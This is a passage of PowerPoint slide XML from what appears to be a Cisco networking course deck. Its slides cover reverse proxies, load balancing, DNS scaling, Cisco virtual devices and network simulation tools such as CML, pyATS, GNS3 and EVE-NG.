            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reverse Proxy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40490D4A-E572-4CE9-B6E5-3025B495C781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246590" y="1047750"/>
            <a:ext cx="5925610" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Client think it is original server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Servers from malicious client  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Used for SSL offload also</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5038CD07-2EDD-4DBF-A390-E055302F05C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1863474" y="2114550"/>
            <a:ext cx="5417052" cy="2490478"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39950264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5443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Load Balancing </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40490D4A-E572-4CE9-B6E5-3025B495C781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246590" y="1047750"/>
            <a:ext cx="5925610" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scale the Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can work as reverse proxy and SSL Offloading</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BADF331C-6914-4960-A7BC-D280C409AAE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="1971080"/>
            <a:ext cx="4824990" cy="2681784"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="657285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5443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Securing and Scaling DNS </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0D12F28-956F-4746-AC5D-B364579653A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1371600" y="1276350"/>
            <a:ext cx="5867400" cy="2636653"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29760845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EF665-0935-42E1-9339-85CB3664B3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="678988" y="1638644"/>
            <a:ext cx="7598042" cy="1265541"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:cs typeface="CiscoSansTT ExtraLight"/>
              </a:rPr>
              <a:t>Network Simulation and Test Tools</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:cs typeface="CiscoSansTT ExtraLight"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6107D26-D4A2-490F-BDE9-401E7F1EF2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294" y="213670"/>
            <a:ext cx="941388" cy="585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0A95B869-A19A-499A-84CC-05CD9768F679}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="511442" y="1809750"/>
            <a:ext cx="7696200" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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srgbClr val="282828"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="CiscoSansTT Thin"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282828"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="CiscoSansTT Thin"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srgbClr val="282828"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:latin typeface="CiscoSansTT ExtraLight"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31245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5443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cisco Virtual Devices </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB5E09B-9106-4FFC-B98D-BE320CA363AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246590" y="1047750"/>
            <a:ext cx="5925610" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IOS-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>XRv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IOSv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NX-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>OSv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>UCSM Platform Emulator</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ASAv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSR1000v</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ACI Simulator </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="43488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5443" y="171449"/>
            <a:ext cx="8434845" cy="495301"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1300" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="57148" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="344685" indent="-342900"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="103754"/>
            <a:ext cx="8345488" cy="731837"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Network Simulation Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAB5E09B-9106-4FFC-B98D-BE320CA363AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="246590" y="1047750"/>
            <a:ext cx="7297210" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CML 2.0 (used in this course labs) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developer.cisco.com/modeling-labs/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cisco </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pyATS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://developer.cisco.com/pyats/</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>GNS3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>www.gns3.com</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>EVE-NG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>www.eve-ng.net/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
